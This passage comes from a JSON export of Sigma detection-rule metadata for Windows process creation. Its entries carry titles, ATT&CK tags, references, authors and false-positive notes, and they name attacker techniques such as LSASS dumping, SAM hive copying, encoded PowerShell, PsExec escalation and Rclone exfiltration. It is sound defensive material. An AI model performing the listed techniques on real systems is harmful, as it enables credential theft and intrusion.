"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", - "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", - "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/01/02", - "filename": "proc_creation_win_susp_powershell_encode.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6", - "value": "PowerShell Encoded Character Syntax", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1281103918693482496", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_param.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2020/07/09", - "filename": "proc_creation_win_susp_powershell_encoded_param.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", - "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "value": "Suspicious Encoded PowerShell Command Line", - "meta": { - "refs": [ - "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_enc_cmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2018/09/03", - "filename": "proc_creation_win_susp_powershell_enc_cmd.yml", - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", - "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "value": "PowerShell Get-Process LSASS", - "meta": { - "refs": [ - "https://twitter.com/PythonResponder/status/1385064506049630211", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], - "creation_date": "2021/04/23", - "filename": "proc_creation_win_susp_powershell_getprocess_lsass.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", - "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "meta": { - "refs": [ - "http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_hidden_b64_cmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_powershell_hidden_b64_cmd.yml", - "author": "John Lambert (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious ways to run Invoke-Execution using IEX acronym", - "uuid": "09576804-7a05-458e-a817-eb718ca91f54", - "value": "Suspicious PowerShell IEX Execution Patterns", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml" - ], - "tags": "No established tags", - "creation_date": "2022/03/24", - "filename": "proc_creation_win_susp_powershell_iex_patterns.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate scripts that use IEX" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious powershell invocations from interpreters or unusual programs", - "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db", - "value": "Suspicious PowerShell Invocation Based on Parent Process", - "meta": { - "refs": [ - "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_combo.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_powershell_parent_combo.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Microsoft Operations Manager (MOM)", - "Other scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious parents of powershell.exe", - "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", - "value": "Suspicious PowerShell Parent Process", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_process.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/03/20", - "filename": "proc_creation_win_susp_powershell_parent_process.yml", - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", - "level": "high", - "falsepositive": [ - "Other scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "uuid": "1af57a4b-460a-4738-9034-db68b880c665", - "value": "PowerShell SAM Copy", - "meta": { - "refs": [ - "https://twitter.com/splinter_code/status/1420546784250769408", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2021/07/29", - "filename": "proc_creation_win_susp_powershell_sam_access.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious sub processes spawned by PowerShell", - "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "value": "Suspicious PowerShell Sub Processes", - "meta": { - "refs": [ - "https://twitter.com/ankit_anubhav/status/1518835408502620162", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml" - ], - "tags": "No established tags", - "creation_date": "2022/04/26", - "filename": "proc_creation_win_susp_powershell_sub_processes.yml", - "author": "Florian Roth, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", - "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", - "value": "Net WebClient Casing Anomalies", - "meta": { - "refs": [ - "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/05/24", - "filename": "proc_creation_win_susp_powershell_webclient_casing.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", - "value": "NodejsTools PressAnyKey Lolbin", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1463526834918854661", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/01/11", - "filename": "proc_creation_win_susp_pressynkey_lolbin.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Attackers can use print.exe for remote file copy", - "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", - "value": "Abusing Print Executable", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Print/", - "https://twitter.com/Oddvarmoe/status/985518877076541440", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_win_susp_print.yml", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", - "value": "Suspicious Use of Procdump on LSASS", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" - ], - "creation_date": "2018/10/30", - "filename": "proc_creation_win_susp_procdump_lsass.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42", - "value": "Process Hacker / System Informer Usage", - "meta": { - "refs": [ - "https://processhacker.sourceforge.io/", - "https://github.com/winsiderss/systeminformer", - "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/10", - "filename": "proc_creation_win_susp_process_hacker.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Sometimes used by developers or system administrators for debugging purposes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", - "value": "Suspicious Program Names", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/11", - "filename": "proc_creation_win_susp_progname.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate tools that accidentally match on the searched patterns" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects user accept agreement execution in psexec commandline", - "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", - "value": "Psexec Accepteula Condition", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexec_eula.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569", - "attack.t1021" - ], - "creation_date": "2020/10/30", - "filename": "proc_creation_win_susp_psexec_eula.yml", - "author": "omkar72", - "level": "medium", - "falsepositive": [ - "Administrative scripts." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", - "uuid": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", - "value": "PsExec Service Execution", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.youtube.com/watch?v=ro2QuZTIMBM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/21", - "filename": "proc_creation_win_susp_psexesvc.yml", - "author": "Romaissa Adjailia, FLorian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "uuid": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", - "value": "PsExec Service Execution as LOCAL SYSTEM", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/21", - "filename": "proc_creation_win_susp_psexesvc_as_system.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "uuid": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", - "value": "Renamed PsExec Service Execution", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.youtube.com/watch?v=ro2QuZTIMBM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/21", - "filename": "proc_creation_win_susp_psexesvc_renamed.yml", - "author": "FLorian Roth", - "level": "high", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", - "value": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], - "creation_date": "2021/11/23", - "filename": "proc_creation_win_susp_psexex_paexec_escalate_system.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious flags used by PsExec and PAExec but no usual program name in command line", - "uuid": "207b0396-3689-42d9-8399-4222658efc99", - "value": "PsExec/PAExec Flags", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], - "creation_date": "2021/05/22", - "filename": "proc_creation_win_susp_psexex_paexec_flags.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Threat actors can use the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery.", - "uuid": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", - "value": "Suspicious Use of PsLogList", - "meta": { - "refs": [ - "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", - "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002" - ], - "creation_date": "2021/12/18", - "filename": "proc_creation_win_susp_psloglist.yml", - "author": "Nasreddine Bencherchali @nas_bench", - "level": "medium", - "falsepositive": [ - "Another tool that uses the command line switches of PsLogList", - "Legitimate use of PsLogList by an administrator" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The psr.exe captures desktop screenshots and saves them on the local machine", - "uuid": "2158f96f-43c2-43cb-952a-ab4580f32382", - "value": "Psr.exe Capture Screenshots", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Psr/", - "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ], - "creation_date": "2019/10/12", - "filename": "proc_creation_win_susp_psr_capture_screenshots.yml", - "author": "Beyu Denis, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", - "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", - "value": "PowerShell Script Run in AppData", - "meta": { - "refs": [ - "https://twitter.com/JohnLaTwC/status/1082851155481288706", - "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/01/09", - "filename": "proc_creation_win_susp_ps_appdata.yml", - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", - "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "value": "PowerShell DownloadFile", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1104", - "attack.t1105" - ], - "creation_date": "2020/08/28", - "filename": "proc_creation_win_susp_ps_downloadfile.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", - "value": "Suspicious PowerShell Obfuscated PowerShell Code", - "meta": { - "refs": [ - "https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/07/11", - "filename": "proc_creation_win_susp_ps_encoded_obfusc.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use Radmin Viewer Utility to remotely control Windows device", - "uuid": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", - "value": "Use Radmin Viewer Utility", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", - "https://www.radmin.fr/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_radmin.yml" - ], - "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" - ], - "creation_date": "2022/01/22", - "filename": "proc_creation_win_susp_radmin.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", - "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", - "value": "Rar Usage with Password and Compression Level", - "meta": { - "refs": [ - "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", - "https://ss64.com/bash/rar.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rar_flags.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2020/05/12", - "filename": "proc_creation_win_susp_rar_flags.yml", - "author": "@ROxPinTeddy", - "level": "high", - "falsepositive": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process related to rasdial.exe", - "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", - "value": "Suspicious RASdial Activity", - "meta": { - "refs": [ - "https://twitter.com/subTee/status/891298217907830785", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rasdial_activity.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_rasdial_activity.yml", - "author": "juju4", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167", - "value": "Suspicious RazerInstaller Explorer Subprocess", - "meta": { - "refs": [ - "https://twitter.com/j0nh4t/status/1429049506021138437", - "https://streamable.com/q2dsji", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1553" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_susp_razorinstaller_explorer.yml", - "author": "Florian Roth, Maxime Thiebaut", - "level": "high", - "falsepositive": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638", - "value": "Rclone Execution via Command Line or PowerShell", - "meta": { - "refs": [ - "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", - "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", - "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ], - "creation_date": "2021/05/10", - "filename": "proc_creation_win_susp_rclone_execution.yml", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", - "level": "high", - "falsepositive": [ - "Legitimate RClone use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7", - "value": "Recon Information for Export with Command Prompt", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119" - ], - "creation_date": "2021/07/30", - "filename": "proc_creation_win_susp_recon.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a set of suspicious network related commands often used in recon stages", - "uuid": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "value": "Network Reconnaissance Activity", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" - ], - "creation_date": "2022/02/07", - "filename": "proc_creation_win_susp_recon_network_activity.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "uuid": "883835a7-df45-43e4-bf1d-4268768afda4", - "value": "Regedit as Trusted Installer", - "meta": { - "refs": [ - "https://twitter.com/1kwpeter/status/1397816101455765504", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2021/05/27", - "filename": "proc_creation_win_susp_regedit_trustedinstaller.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", - "uuid": "a2910908-e86f-4687-aeba-76a5f996e652", - "value": "DLL Execution Via Register-cimprovider.exe", - "meta": { - "refs": [ - "https://twitter.com/PhilipTsukerman/status/992021361106268161", - "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_susp_register_cimprovider.yml", - "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", - "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403", - "value": "Suspicious Registration via cscript.exe", - "meta": { - "refs": [ - "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", - "https://ss64.com/vb/cscript.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_registration_via_cscript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/11/05", - "filename": "proc_creation_win_susp_registration_via_cscript.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects various anomalies in relation to regsvr32.exe", - "uuid": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "value": "Regsvr32 Anomaly", - "meta": { - "refs": [ - "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", - "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - 